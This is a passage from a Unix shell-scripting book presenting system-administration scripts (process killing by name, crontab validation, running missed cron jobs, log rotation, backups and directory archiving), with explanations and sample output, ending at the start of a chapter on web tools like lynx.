if [ $# -eq 0 ] ; then
  echo "Usage: $0 [-s signal] [-u user|-t tty] [-n] pattern" >&2
  exit 1
fi

if [ ! -z "$tty" ] ; then
  pids=$(ps cu -t $tty | awk "/ $1$/ { print \$2 }")
elif [ ! -z "$user" ] ; then
  pids=$(ps cu -U $user | awk "/ $1$/ { print \$2 }")
else
  pids=$(ps cu -U ${USER:-$LOGNAME} | awk "/ $1$/ { print \$2 }")
fi

if [ -z "$pids" ] ; then
  echo "$0: no processes match pattern $1" >&2; exit 1
fi

for pid in $pids
do
  # Sending signal $signal to process id $pid: kill might
  # still complain if the process has finished, the user doesn't
  # have permission, etc., but that's okay.
  if [ $donothing -eq 1 ] ; then
    echo "kill $signal $pid"
  else
    kill $signal $pid
  fi
done

exit 0

How It Works
Because this script is so aggressive, I've put some effort into minimizing false pattern matches, so that a pattern like sh won't match output from ps that contains bash or vi crashtest.c, or other values that embed the pattern. This is done by the pattern-match anchors on the awk command:
awk "/ $1$/ { print \$2 }"
Left-rooting the specified pattern, $1, with a leading space and right-rooting the pattern with a trailing $, causes the script to search for the specified pattern 'sh' in the ps output as ' sh$'.
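You can see the rooting behavior in isolation by feeding a few fabricated ps-style lines to the same awk pattern; only the line whose command field is exactly "sh" should survive:

```shell
#!/bin/sh
# Three fake ps lines: "bash" and "crash" merely embed "sh", while
# the middle line ends in " sh" and is the only legitimate match.
pattern="sh"
pids=$(printf 'user 101 0:00 bash\nuser 102 0:00 sh\nuser 103 0:00 crash\n' |
       awk "/ $pattern$/ { print \$2 }")
echo "matched pids: $pids"
```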

Running the Script


This script has a variety of starting flags that let you modify its behavior. The -s signal flag allows you to specify a signal other than the default interrupt signal, SIGINT, to send to the matching process or processes. The -u user and -t tty flags are useful primarily to the root user in killing all processes associated with a specified user or TTY device, respectively. And the -n flag gives you the option of having the script report what it would do without actually sending any signals. Finally, a pattern must be specified.

The Results
To kill all the csmount processes on my Mac OS X system, I can now use the following:
$ ./killall -n csmount
kill -INT 1292
kill -INT 1296
kill -INT 1306
kill -INT 1310
kill -INT 1318

Hacking the Script


There's an unlikely, though not impossible, bug in this script. To match only the specified pattern, the awk invocation outputs the process ID only of processes that match the pattern plus a leading space at the end of the input line. However, it's theoretically possible to have two processes running, one called, say, bash and the other emulate bash. If killall is invoked with bash as the pattern, both of these processes will be matched, although only the former is a true match. Solving this to give consistent cross-platform results would prove quite tricky.
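The false positive is easy to demonstrate with two fabricated command lines, both of which end in " bash" and therefore both satisfy the rooted pattern:

```shell
#!/bin/sh
# Both fake ps lines end in " bash", so the left/right-rooted pattern
# / bash$/ matches both -- the second one is the false positive
# described above.
matches=$(printf 'user 201 0:00 bash\nuser 202 0:00 emulate bash\n' |
          awk '/ bash$/ { print $2 }')
echo "$matches"
```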
If you're motivated, you could also write a script based heavily on the killall script that would let you renice jobs by name, rather than just by process ID. The only change required would be to invoke renice rather than kill.

#53 Validating User crontab Entries


One of the most helpful facilities in Unix is cron, with its ability to schedule jobs at arbitrary times in the future, recurring every minute, every few hours, monthly, or annually. Every good system administrator has a Swiss Army knife of scripts running from the crontab file.
However, the format for entering cron specifications is a bit tricky, and the cron fields have numeric values, ranges, sets, and even mnemonic names for days of the week or months. What's worse is that the crontab program generates insufficient error messages when scanning in a cron file that might be incorrectly structured.
For example, specify a day of the week with a typo, and crontab reports
"/tmp/crontab.Dj7Tr4vw6R":9: bad day-of-week
crontab: errors in crontab file, can't install
In fact, there's a second error in the sample input file, on line 12, but crontab is going to force us to take the long way around to find it because of its poor error-checking code.
Instead of doing it crontab's way, a somewhat lengthy shell script can step through the crontab files, checking the syntax and ensuring that values are within reasonable ranges. One of the reasons that this validation is possible in a shell script is that sets and ranges can be treated as individual values. So to test whether 3-11 or 4,6,9 are acceptable values for a field, simply test 3 and 11 in the former case, and 4, 6, and 9 in the latter.
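That range-and-list flattening, which the script later performs with sed, looks like this in isolation:

```shell
#!/bin/sh
# A range like "3-11" and a list like "4,6,9" both collapse into
# individual test values once the punctuation becomes whitespace.
range=$(echo "3-11"  | sed 's/[,-]/ /g')
list=$(echo "4,6,9" | sed 's/[,-]/ /g')
echo "range -> $range"
echo "list  -> $list"
```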

The Code
#!/bin/sh

# verifycron - Checks a crontab file to ensure that it's
#   formatted properly. Expects standard cron notation of
#      min hr dom mon dow CMD
#   where min is 0-59, hr is 0-23, dom is 1-31, mon is 1-12 (or names)
#   and dow is 0-7 (or names). Fields can be ranges (a-e), lists
#   separated by commas (a,c,z), or an asterisk. Note that the step
#   value notation of Vixie cron (e.g., 2-6/2) is not supported by this script.

validNum()
{
  # Return 0 if valid, 1 if not. Specify number and max value as args
  num=$1
  max=$2

  if [ "$num" = "X" ] ; then
    return 0
  elif [ ! -z $(echo $num | sed 's/[[:digit:]]//g') ] ; then
    return 1
  elif [ $num -lt 0 -o $num -gt $max ] ; then
    return 1
  else
    return 0
  fi
}

validDay()
{
  # Return 0 if a valid dayname, 1 otherwise

  case $(echo $1 | tr '[:upper:]' '[:lower:]') in
    sun*|mon*|tue*|wed*|thu*|fri*|sat*) return 0 ;;
    X) return 0 ;;   # special case - it's an "*"
    *) return 1
  esac
}

validMon()
{
  # Return 0 if a valid month name, 1 otherwise

  case $(echo $1 | tr '[:upper:]' '[:lower:]') in
    jan*|feb*|mar*|apr*|may|jun*|jul*|aug*) return 0   ;;
    sep*|oct*|nov*|dec*)                    return 0   ;;
    X) return 0 ;;   # special case, it's an "*"
    *) return 1      ;;
  esac
}

fixvars()
{
  # Translate all '*' into 'X' to bypass shell expansion hassles
  # Save original input as "sourceline" for error messages

  sourceline="$min $hour $dom $mon $dow $command"

  min=$(echo "$min"   | tr '*' 'X')
  hour=$(echo "$hour" | tr '*' 'X')
  dom=$(echo "$dom"   | tr '*' 'X')
  mon=$(echo "$mon"   | tr '*' 'X')
  dow=$(echo "$dow"   | tr '*' 'X')
}

if [ $# -ne 1 ] || [ ! -r $1 ] ; then
  echo "Usage: $0 usercrontabfile" >&2; exit 1
fi

lines=0  entries=0  totalerrors=0

while read min hour dom mon dow command
do
  lines="$(($lines + 1))"
  errors=0
  if [ -z "$min" -o "${min%${min#?}}" = "#" ] ; then
    continue   # nothing to check
  elif [ ! -z $(echo ${min%${min#?}} | sed 's/[[:digit:]]//') ] ; then
    continue   # first char not digit: skip!
  fi

  entries="$(($entries + 1))"

  fixvars

  #### Broken into fields, all '*' replaced with 'X'

  # Minute check
  for minslice in $(echo "$min" | sed 's/[,-]/ /g') ; do
    if ! validNum $minslice 60 ; then
      echo "Line ${lines}: Invalid minute value \"$minslice\""
      errors=1
    fi
  done

  # Hour check
  for hrslice in $(echo "$hour" | sed 's/[,-]/ /g') ; do
    if ! validNum $hrslice 24 ; then
      echo "Line ${lines}: Invalid hour value \"$hrslice\""
      errors=1
    fi
  done

  # Day of month check
  for domslice in $(echo $dom | sed 's/[,-]/ /g') ; do
    if ! validNum $domslice 31 ; then
      echo "Line ${lines}: Invalid day of month value \"$domslice\""
      errors=1
    fi
  done

  # Month check
  for monslice in $(echo "$mon" | sed 's/[,-]/ /g') ; do
    if ! validNum $monslice 12 ; then
      if ! validMon "$monslice" ; then
        echo "Line ${lines}: Invalid month value \"$monslice\""
        errors=1
      fi
    fi
  done

  # Day of week check
  for dowslice in $(echo "$dow" | sed 's/[,-]/ /g') ; do
    if ! validNum $dowslice 7 ; then
      if ! validDay $dowslice ; then
        echo "Line ${lines}: Invalid day of week value \"$dowslice\""
        errors=1
      fi
    fi
  done

  if [ $errors -gt 0 ] ; then
    echo ">>>> ${lines}: $sourceline"
    echo ""
    totalerrors="$(($totalerrors + 1))"
  fi
done < $1

echo "Done. Found $totalerrors errors in $entries crontab entries."
exit 0

How It Works
The greatest challenge in getting this script to work is sidestepping problems with the shell wanting to expand the field value *. An asterisk is perfectly acceptable in a cron entry, and indeed is quite common, but give one to a backtick command and it'll expand to a list of the files in the current directory, which is definitely not a desired result. Rather than puzzle through the combination of single and double quotes necessary to solve this problem, it proves quite a bit simpler to replace each asterisk with an X, which is what the fixvars function accomplishes.
Also worthy of note is the simple solution to processing comma- and dash-separated lists of values. The punctuation is simply replaced with spaces, and each value is tested as if it were a stand-alone numeric value. That's what the $() sequence does in the for loops:
$(echo "$dow" | sed 's/[,-]/ /g')
With this in the code, it's simple to step through all numeric values, ensuring that each and every one is valid and within the range for that specific crontab field parameter.

Running the Script


This script is easy to run: Just specify the name of a crontab file as its only argument. To work with an existing crontab file, do this:
$ crontab -l > my.crontab
$ verifycron my.crontab
$ rm my.crontab

The Results
Using a sample crontab file that has two errors and lots of comments, the script produced these results:
$ verifycron sample.crontab
Line 10: Invalid day of week value "Mou"
>>>> 10: 06 22 * * Mou /home/ACeSystem/bin/del_old_ACinventories.pl

Line 12: Invalid minute value "99"
>>>> 12: 99 22 * * 1-3,6 /home/ACeSystem/bin/dump_cust_part_no.pl

Done. Found 2 errors in 17 crontab entries.
The sample crontab file with the two errors, along with all the shell scripts explored in this book, is available at the official Wicked Cool Shell Scripts website, at http://www.intuitive.com/wicked/

Hacking the Script


Two enhancements would be potentially worth adding to this script. Validating the compatibility of month and day combinations would ensure that users don't schedule a cron job to run on, for example, 31 February, which will never happen. It could also be useful to check that the command being invoked can actually be found, but that would entail parsing and processing a PATH variable (i.e., a list of directories within which to look for the commands specified in the script), which can be set explicitly within a crontab file. That could be quite tricky....
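A partial version of that check, one that deliberately ignores any PATH= line set inside the crontab itself, could lean on command -v; the check_cmd helper below is illustrative, not part of the script:

```shell
#!/bin/sh
# Report whether a crontab entry's command name resolves in the
# *current* PATH. (A crontab-local PATH= setting would require real
# parsing, which is the tricky part noted above.)
check_cmd()
{
  if command -v "$1" > /dev/null 2>&1 ; then
    echo "$1: found"
  else
    echo "$1: NOT FOUND in current PATH"
  fi
}
check_cmd ls
check_cmd no_such_command_xyz
```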

#54 Ensuring That System cron Jobs Are Run


Until recently, Unix systems were all designed and developed to run as servers, up 24 hours a day, 7 days a week,
forever. You can see that implicit expectation in the design of the cr on facility: There's no point in scheduling jobs for
2:17am every Thursday if the system is shut down at 6pm for the night.
Yet many modern Unix and Linux users do shut down their systems at the end of the day and start them back up the following morning. It's quite alien to Mac OS X users, for example, to leave their systems running overnight, let alone over a weekend or holiday period.
This isn't a big deal with user crontab entries, because those that don't run due to actual shutdown schedules can be tweaked to ensure that they do eventually get invoked consistently. The problem arises when the daily, weekly, and monthly system cron jobs that are part of the underlying system are not run at their predefined times.
This script enables the administrator to invoke the daily, weekly, or monthly jobs directly from the command line, as
needed.

The Code
#!/bin/sh

# docron - Runs the daily, weekly, and monthly system cron jobs on a
#   system that's likely to be shut down during the usual time of
#   day when the system cron jobs would occur.

rootcron="/etc/crontab"

if [ $# -ne 1 ] ; then
  echo "Usage: $0 [daily|weekly|monthly]" >&2
  exit 1
fi

if [ "$(id -u)" -ne 0 ] ; then
  # or you can use $(whoami) != "root" here
  echo "$0: Command must be run as 'root'" >&2
  exit 1
fi

job="$(awk "NR > 6 && /$1/ { for (i=7;i<=NF;i++) print \$i }" $rootcron)"

if [ -z $job ] ; then
  echo "$0: Error: no $1 job found in $rootcron" >&2
  exit 1
fi

SHELL=/bin/sh      # to be consistent with cron's default

eval $job

How It Works
Located in either /etc/daily, /etc/weekly, and /etc/monthly or /etc/cron.daily, /etc/cron.weekly, and /etc/cron.monthly, these cron jobs are set up completely differently from user crontab files: Each is a directory that contains a set of scripts, one per job, that are run by the crontab facility, as specified in the /etc/crontab file. To make this even more confusing, the format of the /etc/crontab file is different too, because it adds an additional field that indicates what effective user ID should run the job.
To start, then, the /etc/crontab file specifies the hour of the day (in the second column of the output that follows) at which to run the daily, weekly, and monthly jobs:
$ egrep '(daily|weekly|monthly)' /etc/crontab
# Run daily/weekly/monthly jobs.
15      3       *       *       *       root    periodic daily
30      4       *       *       6       root    periodic weekly
30      5       1       *       *       root    periodic monthly

What happens to the daily, weekly, and monthly jobs, though, if this system isn't running at 3:15am every night, at
4:30am on Saturday morning, and at 5:30am on the first of each month?

Rather than trying to force cron to run the cron jobs, this script locates the jobs and runs them directly with eval. The only difference between invoking the jobs from this script and invoking them as part of a cron job is that when jobs are run from cron, their output stream is automatically turned into an email message, whereas with this script the output stream is displayed on the screen.
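If you'd rather mimic cron's mail behavior, you can capture docron's combined output stream and hand it to mail(1). The demo below substitutes a stand-in function for docron so nothing system-wide actually runs here; the real pipeline, with an illustrative recipient, appears in the comment:

```shell
#!/bin/sh
# Stand-in for docron so the pipeline shape can be demonstrated safely.
# In real use you might run:
#   docron daily 2>&1 | mail -s "docron daily output" root
docron_demo() {
  echo "pretend daily job output"
  echo "pretend warning" >&2
}
captured=$(docron_demo 2>&1)   # 2>&1 folds stderr into the capture
echo "$captured"
```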

Running the Script


This script must be run as root and has one parameter: either daily, weekly, or monthly, to indicate which group of system cron jobs you want to run. To run as root, using sudo is recommended.

The Results
This script has essentially no output and displays no results unless an error is encountered either within the script or
within one of the jobs spawned by the cron scripts.

Hacking the Script


A subtle problem here is that some jobs shouldn't be run more than once a week or once a month, so there should be some sort of check in place to ensure that that doesn't happen. Furthermore, sometimes the recurring system jobs might well run from cron, so we can't make a blanket assumption that if docron hasn't run, the jobs haven't run.
One solution would be to create three empty timestamp files, one each for daily, weekly, and monthly jobs, and then to add new entries to the /etc/daily, /etc/weekly, and /etc/monthly directories that update the last-modified date of each timestamp file with touch. This would solve half the problem: docron could then check the last time the recurring cron job was run and quit if an insufficient amount of time had passed.
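The timestamp-file check could be sketched like this; the marker path and the 28-day threshold are illustrative choices, not values from the book:

```shell
#!/bin/sh
# Sketch of the timestamp guard: run the monthly jobs only if the
# marker file is older than 28 days, using the same find -mtime
# idiom the chapter's scripts rely on.
stamp=/tmp/docron.monthly.stamp.$$
touch "$stamp"                     # pretend the jobs just ran
if [ -n "$(find "$stamp" -mtime +28 -print 2>/dev/null)" ] ; then
  result="run monthly jobs (and touch the marker again)"
else
  result="ran recently: skipping"
fi
echo "$result"
rm -f "$stamp"
```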
What this solution doesn't avoid is the situation in which, six weeks after the monthly cron job last ran, the admin runs docron to invoke the monthly jobs. Then four days later someone forgets to shut off their computer and the monthly cron job is invoked. How can that job know that it's not necessary to run the monthly jobs after all?
Two scripts can be added to the appropriate directory. One script must run first from run-script or periodic (the standard ways to invoke cron jobs) and can turn off the executable bit on all other scripts in the directory except its partner script, which turns the execute bit back on after run-script or periodic has scanned the directory and ascertained that there's nothing to do: None of the files in the directory appear to be executable, and therefore cron doesn't run them. This is not a great solution, however, because there's no guarantee of script evaluation order, and if we can't guarantee the order in which the new scripts will be run, the entire solution fails.
There might not be a complete solution to this dilemma, actually. Or it might involve writing a wrapper for run-script or periodic that would know how to manage timestamps to ensure that jobs weren't executed too frequently.

#55 Rotating Log Files


Users who don't have much experience with Unix can be quite surprised by how many commands, utilities, and
daemons log events to system log files. Even on a computer with lots of disk space, it's important to keep an eye on
the size of these files and, of course, on their contents too.
As a result, most sysadmins have a set of instructions that they place at the top of their log file analysis utilities, similar to the following:
mv $log.2 $log.3
mv $log.1 $log.2
mv $log   $log.1
touch $log
If run weekly, this would produce a rolling one-month archive of log file information divided into week-size portions of data. However, it's just as easy to create a script that accomplishes this for all log files in the /var/log directory at once, thereby relieving any log file analysis scripts of the burden.
The script steps through each file in the /var/log directory that matches a particular set of criteria, checking each matching file's rotation schedule and last-modified date to see whether it's time for the file to be rotated.

The Code
#!/bin/sh

# rotatelogs - Rolls logfiles in /var/log for archival purposes.
#    Uses a config file to allow customization of how frequently
#    each log should be rolled. The config file is in
#       logfilename=duration
#    format, where duration is in days. If, in the config
#    file, an entry is missing for a particular logfilename,
#    rotatelogs won't rotate the file more frequently than every seven days.

logdir="/var/log"
config="/var/log/rotatelogs.conf"
mv="/bin/mv"

default_duration=7
count=0

duration=$default_duration

if [ ! -f $config ] ; then
  echo "$0: no config file found. Can't proceed." >&2 ; exit 1
fi

if [ ! -w $logdir -o ! -x $logdir ] ; then
  echo "$0: you don't have the appropriate permissions in $logdir" >&2
  exit 1
fi

cd $logdir

# While we'd like to use ':digit:' with the find, many versions of
# find don't support POSIX character class identifiers, hence [0-9]

for name in $(find . -type f -size +0c ! -name '*[0-9]*' \
     ! -name '\.*' ! -name '*conf' -maxdepth 1 -print | sed 's/^\.\///')
do
  count=$(( $count + 1 ))

  # Grab this entry from the config file

  duration="$(grep "^${name}=" $config | cut -d= -f2)"

  if [ -z $duration ] ; then
    duration=$default_duration
  elif [ "$duration" = "0" ] ; then
    echo "Duration set to zero: skipping $name"
    continue
  fi

  back1="${name}.1"; back2="${name}.2";
  back3="${name}.3"; back4="${name}.4";

  # If the most recently rolled log file (back1) has been modified within
  # the specific quantum, then it's not time to rotate it.

  if [ -f "$back1" ] ; then
    if [ -z $(find \"$back1\" -mtime +$duration -print 2>/dev/null) ]
    then
      echo -n "$name's most recent backup is more recent than $duration "
      echo "days: skipping"
      continue
    fi
  fi

  echo "Rotating log $name (using a $duration day schedule)"

  # Rotate, starting with the oldest log

  if [ -f "$back3" ] ; then
    echo "... $back3 -> $back4" ; $mv -f "$back3" "$back4"
  fi
  if [ -f "$back2" ] ; then
    echo "... $back2 -> $back3" ; $mv -f "$back2" "$back3"
  fi
  if [ -f "$back1" ] ; then
    echo "... $back1 -> $back2" ; $mv -f "$back1" "$back2"
  fi
  if [ -f "$name" ] ; then
    echo "... $name -> $back1" ; $mv -f "$name" "$back1"
  fi

  touch "$name"
  chmod 0600 "$name"

done

if [ $count -eq 0 ] ; then
  echo "Nothing to do: no log files big enough or old enough to rotate"
fi

exit 0
To truly be useful, the script needs to work with a configuration file that lives in /var/log, which allows different log
files to be set to different rotation schedules. The contents of a typical configuration file are as follows:
# Configuration file for the log rotation script.
# Format is     name=duration     where 'name' can be any
# filename that appears in the /var/log directory. Duration
# is measured in days.

ftp.log=30
lastlog=14
lookupd.log=7
lpr.log=30
mail.log=7
netinfo.log=7
secure.log=7
statistics=7
system.log=14
# Anything with a duration of zero is not rotated
wtmp=0

How It Works
The heart of this script is the find statement:
for name in $(find . -type f -size +0c ! -name '*[0-9]*' \
     ! -name '\.*' ! -name '*conf' -maxdepth 1 -print | sed 's/^\.\///')
This creates a loop, returning all files in the /var/log directory that are greater than 0 characters in size, don't
contain a number in their name, don't start with a period (Mac OS X in particular dumps a lot of oddly named log files
in this directory; they all need to be skipped), and don't end with the word "conf" (we don't want to rotate out the
rotatelogs.conf file, for obvious reasons!). The -maxdepth 1 ensures that find doesn't step into
subdirectories. Finally, the sed invocation removes any leading ./ sequences.
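Those criteria are easy to try in isolation. The following harness is my own (the scratch directory and file names are invented for illustration); it builds a stand-in for /var/log and shows which files the find invocation actually selects. Note that -maxdepth is given first here, since GNU find warns when it follows other tests.

```shell
#!/bin/sh
# Demonstrate the rotatelogs find criteria against a scratch directory.

scratch="$(mktemp -d)"
cd "$scratch"

echo data > system.log          # eligible: nonempty, no digit, no dot, no conf
echo data > system.log.1        # skipped: contains a digit (a rolled log)
echo data > .hidden.log         # skipped: starts with a period
echo data > rotatelogs.conf     # skipped: ends in "conf"
touch empty.log                 # skipped: zero bytes (-size +0c)

find . -maxdepth 1 -type f -size +0c ! -name '*[0-9]*' \
    ! -name '\.*' ! -name '*conf' -print | sed 's/^\.\///'
# prints only: system.log
```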
Lazy is good!

The rotatelogs script demonstrates a fundamental concept in shell script
programming: the value of avoiding duplicate work. Rather than have each log analysis
script rotate logs, a single log rotation script centralizes the task and makes modifications
easy.

The Results
$ sudo rotatelogs
ftp.log's most recent backup is more recent than 30 days: skipping
Rotating log lastlog (using a 14 day schedule)
... lastlog -> lastlog.1
lpr.log's most recent backup is more recent than 30 days: skipping
Notice that of all the log files in /var/log, only three matched the specified find criteria, and of those only one,
lastlog, hadn't been backed up sufficiently recently, according to the duration values in the configuration file shown
earlier.

Hacking the Script


One example of how this script could be made even more useful is to have the oldest archive file, the old $back4 file,
emailed to a central storage site before it's overwritten by the mv command in the following statement:
echo "... $back3 -> $back4" ; $mv -f "$back3" "$back4"
Another useful enhancement to rotatelogs would be to compress all rotated logs to further save on disk space,
which would also require that the script recognize and work properly with compressed files as it proceeded.
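A minimal sketch of that compression enhancement might look like the following. This is my own addition, assuming gzip is available; the function name is invented, and a real integration would also need the rotation's -f tests and mv commands changed to look for the .gz names.

```shell
#!/bin/sh
# compress_rolled - gzip any uncompressed rolled logs (name.1 .. name.4).
# Sketch only; rotatelogs itself would need to learn the .gz names too.

compress_rolled()
{
  for f in "$1".1 "$1".2 "$1".3 "$1".4 ; do
    if [ -f "$f" ] && [ ! -f "$f.gz" ] ; then
      gzip "$f"       # leaves $f.gz in place of $f
    fi
  done
}
```

It would be called once per rotated log, for example compress_rolled /var/log/system.log at the bottom of the main loop.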

#56 Managing Backups


Managing system backups is a task that all system administrators are familiar with, and it's something that no one
thanks you for doing unless something goes horribly wrong. Even on a single-user personal computer running Linux,
some sort of backup schedule is essential, and it's usually only after you've been burned once, losing a chunk of data
and files, that you realize the value of a regular backup.
One of the reasons so many systems neglect backups is that many of the backup tools are crude and difficult to
understand. The dump and restore commands (called ufsdump and ufsrestore in Solaris) are typical, with five
"dump levels" and an intimidating configuration file required.
A shell script can solve this problem. This script backs up a specified set of directories, either incrementally (that is,
only those files that have changed since the last backup) or fully (all files). The backup is compressed on the fly
to minimize space usage, and the script output can be directed to a file, a tape device, a remotely mounted NFS
partition, or even a CD burner on compatible systems.

The Code
#!/bin/sh

# backup - Creates either a full or incremental backup of a set of
#   defined directories on the system. By default, the output
#   file is saved in /tmp with a timestamped filename, compressed.
#   Otherwise, specify an output device (another disk, or a
#   removable storage device).

usageQuit()
{
  cat << "EOF" >&2
Usage: $0 [-o output] [-i|-f] [-n]
  -o lets you specify an alternative backup file/device
  -i is an incremental or -f is a full backup, and -n prevents
  updating the timestamp if an incremental backup is done.
EOF
  exit 1
}

compress="bzip2"                               # change for your favorite compression app
inclist="/tmp/backup.inclist.$(date +%d%m%y)"
output="/tmp/backup.$(date +%d%m%y).bz2"
tsfile="$HOME/.backup.timestamp"
btype="incremental"                            # default to an incremental backup
noinc=0                                        # and an update of the timestamp

trap "/bin/rm -f $inclist" EXIT

while getopts "o:ifn" arg; do
  case "$arg" in
    o ) output="$OPTARG";        ;;
    i ) btype="incremental";     ;;
    f ) btype="full";            ;;
    n ) noinc=1;                 ;;
    ? ) usageQuit                ;;
  esac
done
shift $(($OPTIND - 1))

echo "Doing $btype backup, saving output to $output"

timestamp="$(date +'%m%d%I%M')"

if [ "$btype" = "incremental" ] ; then
  if [ ! -f $tsfile ] ; then
    echo "Error: can't do an incremental backup: no timestamp file" >&2
    exit 1
  fi
  find $HOME -depth -type f -newer $tsfile -user ${USER:-LOGNAME} | \
  pax -w -x tar | $compress > $output
  failure="$?"
else
  find $HOME -depth -type f -user ${USER:-LOGNAME} | \
  pax -w -x tar | $compress > $output
  failure="$?"
fi

if [ "$noinc" = "0" -a "$failure" = "0" ] ; then
  touch -t $timestamp $tsfile
fi

exit 0

How It Works
For a full system backup, the pax command does all the work, piping its output to a compression program (bzip2 by
default) and then to an output file or device. An incremental backup is a bit trickier, because the standard version of
tar doesn't include any sort of modification time test, unlike the GNU version of tar. The list of files modified since
the previous backup is built with find and saved in the inclist temporary file. That file, emulating the tar output
format for increased portability, is then fed to pax directly.
Choosing when to mark the timestamp for a backup is an area in which many backup programs get messed up,
typically marking the "last backup time" as when the program finished the backup, rather than when it started. Setting
the timestamp to the time of backup completion can be a problem if any files are modified during the backup process
(which can take quite a while if the backup is being fed to a tape device). Because files modified under this scenario
would have a last-modified date older than the timestamp date, they would not be backed up the next night.
However, timestamping before the backup takes place is wrong too, because if the backup fails, there's no way to
reverse the updated timestamp. Both of these problems are avoided by saving the date and time before the backup
starts (in the timestamp variable), but applying the value of $timestamp to $tsfile using the -t flag to
touch only after the backup has succeeded.
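The pattern is easy to lift out on its own. This fragment is an illustrative reduction of mine, not the script itself: run_backup is a stand-in for the real find | pax | bzip2 pipeline, and it uses the 24-hour %H where the script uses the 12-hour %I (arguably safer, since touch -t expects an hour in the range 00-23 and %I loses the a.m./p.m. distinction).

```shell
#!/bin/sh
# Save the timestamp BEFORE the work begins, but apply it to the stamp
# file only AFTER the work succeeds, via touch -t MMDDhhmm.

tsfile="${TMPDIR:-/tmp}/.demo.timestamp"
timestamp="$(date +'%m%d%H%M')"    # captured before any files are copied

run_backup()
{
  true    # stand-in for the real find | pax | $compress pipeline
}

if run_backup ; then
  touch -t "$timestamp" "$tsfile"  # stamp reflects the START of the run
fi
```

If run_backup returns nonzero, the stamp file is left untouched, so the next incremental run picks up everything since the last successful backup.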

Running the Script


This script has a number of options, all of which can be ignored to perform the default incremental backup based on
the timestamp of the last incremental backup. The flags allow you to specify a different output file or device (-o
output), to choose a full backup (-f), to actively choose an incremental backup (-i), or to prevent the timestamp
file from being updated in the case of an incremental backup (-n).

The Results
$ backup
Doing incremental backup, saving output to /tmp/backup.140703.bz2
As you would expect, the output of a backup program isn't very scintillating. But the resulting compressed file is
sufficiently large that it shows plenty of data is within:
$ ls -l /tmp/backup*
-rw-r--r--  1 taylor  wheel  61739008 Jul 14 07:31 backup.140703.bz2

#57 Backing Up Directories


Related to the task of backing up entire file systems is the user-centric task of taking a snapshot of a specific directory
or directory tree. This simple script allows users to easily create a compressed tar archive of a specified directory.

The Code
#!/bin/sh

# archivedir - Creates a compressed archive of the specified directory.

maxarchivedir=10        # size, in blocks, of 'big' directory
compress=gzip           # change to your favorite compression app
progname=$(basename $0)

if [ $# -eq 0 ] ; then
  echo "Usage: $progname directory" >&2 ; exit 1
fi

if [ ! -d $1 ] ; then
  echo "${progname}: can't find directory $1 to archive." >&2 ; exit 1
fi

if [ "$(basename $1)" != "$1" -o "$1" = "." ] ; then
  echo "${progname}: You must specify a subdirectory" >&2
  exit 1
fi

if [ ! -w . ] ; then
  echo "${progname}: cannot write archive file to current directory." >&2
  exit 1
fi

dirsize="$(du -s $1 | awk '{print $1}')"

if [ $dirsize -gt $maxarchivedir ] ; then
  echo -n "Warning: directory $1 is $dirsize blocks. Proceed? [n] "
  read answer
  answer="$(echo $answer | tr '[:upper:]' '[:lower:]' | cut -c1)"
  if [ "$answer" != "y" ] ; then
    echo "${progname}: archive of directory $1 canceled." >&2
    exit 0
  fi
fi

archivename="$(echo $1 | sed 's/$/.tgz/')"

if tar cf - $1 | $compress > $archivename ; then
  echo "Directory $1 archived as $archivename"
else
  echo "Warning: tar encountered errors archiving $1"
fi

exit 0

How It Works
This script is almost all error-checking code, to ensure that it never causes a loss of data or creates an incorrect
snapshot. In addition to the typical tests to validate the presence and appropriateness of the starting argument, this
script also forces the user to be in the parent directory of the subdirectory to be compressed and archived, which
ensures that the archive file is saved in the proper place upon completion. The conditional if [ ! -w . ] ; then
verifies that the user has write permission on the current directory. And this script even warns users before
archiving if the resultant backup file would be unusually large.
Finally, the actual command that archives the specified directory is
tar cf - $1 | $compress > $archivename
The return code of this command is tested to ensure that the script never deletes the directory if an error of any sort
occurs.

Running the Script


This script should be invoked with the name of the desired directory to archive as its only argument. To ensure that the
script doesn't try to archive itself, it requires that a subdirectory of the current directory be specified as the argument,
rather than ".".

The Results
$ archivedir scripts
Warning: directory scripts is 2224 blocks. Proceed? [n] n
archivedir: archive of directory scripts canceled.
This seemed as though it might be a big archive, so I hesitated to create it, but thinking about it, there's no reason not
to proceed after all:
$ archivedir scripts
Warning: directory scripts is 2224 blocks. Proceed? [n] y
Directory scripts archived as scripts.tgz
The results:
$ ls -l scripts.tgz
-rw-r--r--  1 taylor  staff  325648 Jul 14 08:01 scripts.tgz

Helpful for developers

When I'm actively working on a project, I use archivedir in a cron
job to automatically take a snapshot of my working code each night for
archival purposes.
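A concrete crontab entry for that nightly snapshot might look like the following. The paths, project name, and time are purely illustrative assumptions (and this presumes archivedir is somewhere on cron's PATH); adjust them to your own layout.

```shell
# Hypothetical crontab entry: at 3:15 each morning, cd to the parent of
# the project directory (archivedir requires that) and snapshot it.
15 3 * * *   cd $HOME/projects && archivedir mycode >> $HOME/archivedir.log 2>&1
```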

Chapter 7: Web and Internet Users


Overview
One area where Unix really shines is the Internet. Whether it's running a fast server from under your desk or simply
surfing the Web intelligently and efficiently, there's precious little you can't embed in a shell script when it comes to
Internet interaction.
Internet tools are scriptable, even though you might never have thought of them that way. For example, ftp, a
program that is perpetually trapped in debug mode, can be scripted in some very interesting ways, as is explored in
Script #59. It's not universally true, but shell scripting can improve the performance and output of most command-line
utilities that work with some facet of the Internet.
Perhaps the best tool in the Internet scripter's toolbox is lynx, a powerful text-only web-browsing tool. Sites don't look
glamorous when you strip out all the graphics, but lynx has the ability to grab website content and dump it to
standard output, making it a breeze to use grep and sed to extract specific snippets of information from any website,
be it Yahoo!, the Federal Reserve, or even the ESPN.com home page.
Figure 7-1 shows how my own website (http://www.intuitive.com/) looks in the spartan lynx browser:

Figure 7-1: A graphically complex website (http://www.intuitive.com/) in lynx


An alternative browser that's, well, synonymous with lynx is links, offering a similar text-only browsing
environment that has rich possibilities for use in shell scripting. Of the two, lynx is more stable and more widely
distributed.
If you don't have either browser available, you'll need to download and install one or the other before you proceed with
the scripts in this chapter. You can get lynx from http://lynx.browser.org/ and links from
http://links.browser.org/. The scripts in this chapter use lynx, but if you have a preference for links,
it is sufficiently similar that you can easily switch the scripts to use it without much effort.
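If your own wrappers need to cope with either browser being installed, a tiny helper like the following can pick whichever is on the PATH. This is my own convention, not something from this book; pick_browser is an invented name.

```shell
#!/bin/sh
# pick_browser - echo the first command from the argument list that is
# found on the PATH; return 1 if none of them is available.

pick_browser()
{
  for candidate in "$@" ; do
    if command -v "$candidate" >/dev/null 2>&1 ; then
      echo "$candidate"
      return 0
    fi
  done
  return 1
}

# Typical use at the top of a scraper script:
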